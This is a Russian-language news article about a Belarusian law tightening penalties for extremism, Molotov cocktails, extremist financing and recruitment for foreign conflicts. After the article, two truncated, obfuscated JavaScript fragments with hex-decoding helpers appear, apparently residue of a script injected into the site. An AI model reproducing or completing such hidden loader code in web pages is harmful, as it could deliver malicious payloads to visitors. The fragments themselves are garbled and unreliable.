Ответственность за экстремизм и его пропаганду будет усилена с мая

В Беларуси будут наказывать за финансирование экстремистских формирований, разжигание напряженности по языковому принципу, вербовку граждан для участия в военных конфликтах за рубежом и использование «коктейлей Молотова» на акциях протеста.

1409151431_0424.1000x799

Президент Беларуси Александр Лукашенко одобрил решение парламента усилить меры борьбы с проявлениями экстремизма в Беларуси, подписав закон о внесении соответствующих поправок и дополнения в ряд законодательных актов страны, текст которого 22 апреля опубликован на Национально-правовом портале.

Накануне, обращаясь с посланием к белорусскому народу и парламенту глава государства заявил: «Мы готовы на любые мероприятия во имя противостояния терроризму».

Так, Уголовный кодекс дополнен статьей, предусматривающей ответственность за незаконные изготовление, приобретение, передачу во владение, сбыт, хранение, перевозку, пересылку или ношение предметов, поражающее действие которых основано на использовании горючих веществ, включая так называемые «коктейли Молотова».

Лишением свободы будет наказываться создание и финансирование экстремистского формирования, а также участие граждан Беларуси и постоянно проживающих в стране лиц без гражданства в вооруженных конфликтах на территории иностранных государств. Под запретом вербовка, обучение и подготовка белорусских граждан к участию в таких военных действиях, равно как финансирование и материальное обеспечение такой деятельности.

За распространение, изготовление, хранение, перевозку информационной продукции, содержащей призывы к экстремистской деятельности будут штрафовать как юридических, так и физических лиц.

Внесены уточнения в закон «Об оружии», а также закон «О массовых мероприятиях».

Решение об усилении ответственности за экстремистскую деятельность и ее поддержку вступит в силу через 10 дней после его официального опубликования.

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return «websmi.by»},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(«http»)==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "websmi.by"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Поделиться:
  •  
  •  
  •  
  •  
  •  
  •  
  •  

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *